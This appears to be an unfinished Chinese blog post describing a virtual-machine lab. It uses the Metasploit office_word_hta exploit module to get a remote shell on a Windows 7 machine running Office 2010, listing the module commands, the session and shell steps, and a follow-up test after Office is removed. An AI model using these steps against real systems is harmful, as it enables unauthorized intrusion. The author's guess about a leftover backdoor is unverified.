1. 程式人生 > >利用office的漏洞進行滲透(未完待續)

利用office的漏洞進行滲透(未完待續)

本實驗在虛擬機器環境下進行!!!

準備:

Kali            ip: 192.168.0.107

Win7帶office2010           ip:192.168.0.108

我們先啟動使用模組

use exploit/windows/fileformat/office_word_hta

檢視目標

show targets

可以看到目標是ms office word文件

檢視選項

show options

可以看到已經預設幫我們配置好了,我們只需要run執行即可

run執行

可以看到,生成了一個連結,我們複製這個連結給win7去訪問

其實也可以把生成的doc檔案讓win7去執行,但這樣比較麻煩,且不穩定。

點執行

看到kali那裡已經產生了session會話,我們按下回車回到命令列(此時模組還在執行,若還要連線還會建立會話)

使用sessions -i 1來與第一個session建立連線,再輸入shell拿到許可權

擴充套件實驗:

我們用exit關閉連線,讓win7解除安裝office並重啟,再讓win7去訪問看看能不能被滲透

接下來流程是一樣的,run之後把連結那去給win7訪問

然而。。。

還是順利的拿到了shell。。

可能是之前已經留了後門了把。。

過段時間重灌一下win7,並拿win10開下刀

未完待續。。。。